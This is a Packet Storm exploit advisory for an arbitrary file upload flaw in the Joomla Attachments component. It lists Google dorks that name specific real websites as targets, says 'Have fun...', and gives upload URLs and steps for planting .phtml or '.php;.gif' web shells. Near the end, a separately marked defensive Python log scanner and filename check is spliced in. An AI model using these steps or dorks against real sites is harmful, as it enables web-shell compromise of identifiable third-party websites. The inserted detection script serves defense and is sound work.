Joomla Attachments 3.x File Upload

Posted May 26, 2019
Authored by KingSkrupellos

Joomla Attachments component version 3.x suffers from a remote file upload vulnerability.

tags | exploit, remote, file upload
SHA-256 | d5cf192e5152e876357d03867d1696944ce222fb9fd6fc28bbda9eb210bdfcec

####################################################################

# Exploit Title : Joomla Com_Attachments Components 3.x Arbitrary File Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 26/05/2019
# Vendor Homepage : jmcameron.net
# Software Download Links : jmcameron.net/attachments/
jmcameron.net/attachments/updates/3.2.6/attachments-3.2.6.zip
joomlacode.org/gf/download/frsrelease/18688/83852/attachments-2.2.2.zip
joomlacode.org/gf/project/attachments/frs/
github.com/sdc/DevonStudioSchool/tree/master/administrator/components/com_attachments/
# Software Information Links : extensions.joomla.org/extension/attachments/
joomlacode.org/gf/project/attachments/
joomlacode.org/gf/project/attachments3/
# Joomla Affected Versions :
Joomla 3.4.8
Joomla 3.5.1
Joomla 3.6.5
Joomla 3.8.1
Joomla 3.8.11
Joomla 3.8.3
Joomla 3.9.6
# Software Affected Versions [ Component Com_Attachments ] :
2.2.2 and 3.2.6 - 3.x / All previous versions.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks :
inurl:/index.php?option=com_attachments&task=upload
intext:Copyright (C) 2006-2020 BSA Troop 444. All Rights Reserved.
intext:Treadmill Desk from TrekDesk
intext:Copyright © 2015 Ashleigh-D. All rights reserved. Website designed by Mojosync Pty Ltd using Joomla
intext:Fundación Jesuitas Paraguay
intext:© 2019 Mars Society Polska
intext:Designed by atict.com
intext:Copyright © 2017. All Rights Reserved.Webaloss - Realizzazione siti webwebaloss.com
intext:Designed by Burosphere.
intext:Conselho Nacional de Recursos Hídricos CNRH Ministerio Do Desenvolvimento Regional
and more on Google and other search engines... Have fun...
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link [ Similar ] : dl.packetstormsecurity.net/1902-exploits/joomlaattachments326-shell.txt

####################################################################

# Description about Software :
***************************
The 'Attachments' extension allows files to be uploaded and attached to content
articles in Joomla. It includes a plugin to display attachments and a component
for uploading and managing attachments.

####################################################################

# Impact :
***********
Joomla Attachments component 3.x and all previous versions could allow a
remote attacker to upload arbitrary files (including a web shell), caused by the
improper validation of file extensions by multiple scripts reached through index.php.
The issue occurs because the application fails to adequately sanitize user-supplied input.
Exploiting this issue allows attackers to execute arbitrary code within
the context of the affected application. This may facilitate unauthorized access
or privilege escalation; other attacks may also be possible.
By sending a specially crafted HTTP request, a remote attacker could exploit
this vulnerability to upload a malicious PHP script, which could allow the
attacker to execute arbitrary PHP code on the vulnerable system.

####################################################################

# Arbitrary File Upload/Unauthorized File Insertion Exploit :
****************************************************
/index.php?option=com_attachments&task=upload&uri=file&parent_id=1&parent_type=com_content&tmpl=component&from=closeme

/index.php?option=com_attachments&task=upload&uri=file&parent_id=[ARTICLE-ID-NUMBER]/&parent_type=com_content&tmpl=component&from=closeme

Click "Select file to upload instead", fill in the form, set Published => "Yes" and click "Public".

Attach file: upload a .txt, .jpg, .gif, .png, .phtml or .php;.gif file to the vulnerable system.

# Directory File Path :
********************
/attachments/article/[ARTICLE-ID-NUMBER]/kingskrupellos.txt
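The upload path, the upload URL and the file extensions listed above give a defender enough to both validate attachment names and spot exploitation in web server logs. The following script is an added example (not part of the advisory or the Attachments component); the log lines are constructed, and the executable-extension set is an assumption that a site would tune to its own PHP handler configuration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Extensions a typical PHP handler may execute (assumed list; adjust per server).
# The check looks at every dot- or semicolon-separated segment after the base name,
# so double-extension tricks such as "shell.php;.gif" from the advisory are caught.
EXEC_EXTS = {"php", "phtml", "php3", "php4", "php5", "phps", "phar"}

# Common Log Format: ip ident user [ts] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log: the advisory's upload form URL, a fetch of an uploaded
# double-extension file, and a benign .txt attachment on another article.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/May/2019:10:00:01 +0000] "GET /index.php?option=com_attachments'
    '&task=upload&uri=file&parent_id=1&parent_type=com_content&tmpl=component&from=closeme HTTP/1.1" 200 5120',
    '203.0.113.7 - - [26/May/2019:10:00:20 +0000] "GET /attachments/article/1/shell.php;.gif HTTP/1.1" 200 88',
    '198.51.100.4 - - [26/May/2019:10:05:00 +0000] "GET /attachments/article/2/report.txt HTTP/1.1" 200 2048',
]


def is_dangerous_attachment_name(filename: str) -> bool:
    """True if any extension segment of the name is an executable extension."""
    segments = re.split(r"[.;]", filename.lower())
    return any(seg in EXEC_EXTS for seg in segments[1:])


def scan_access_log(lines):
    """Flag com_attachments upload hits and requests for executable files under /attachments/."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["path"])
        qs = parse_qs(url.query)
        if qs.get("option") == ["com_attachments"] and qs.get("task") == ["upload"]:
            alerts.append({"ip": m["ip"], "kind": "attachment_upload",
                           "path": m["path"], "status": m["status"]})
        elif url.path.startswith("/attachments/article/"):
            name = url.path.rsplit("/", 1)[-1]
            if is_dangerous_attachment_name(name):
                alerts.append({"ip": m["ip"], "kind": "executable_attachment",
                               "path": url.path, "status": m["status"]})
    return alerts


if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(alert)
```

The same `is_dangerous_attachment_name` check, placed in front of the upload handler, rejects the `.phtml` and `.php;.gif` names the advisory relies on while still accepting plain `.txt`, `.jpg`, `.gif` and `.png` attachments.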

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################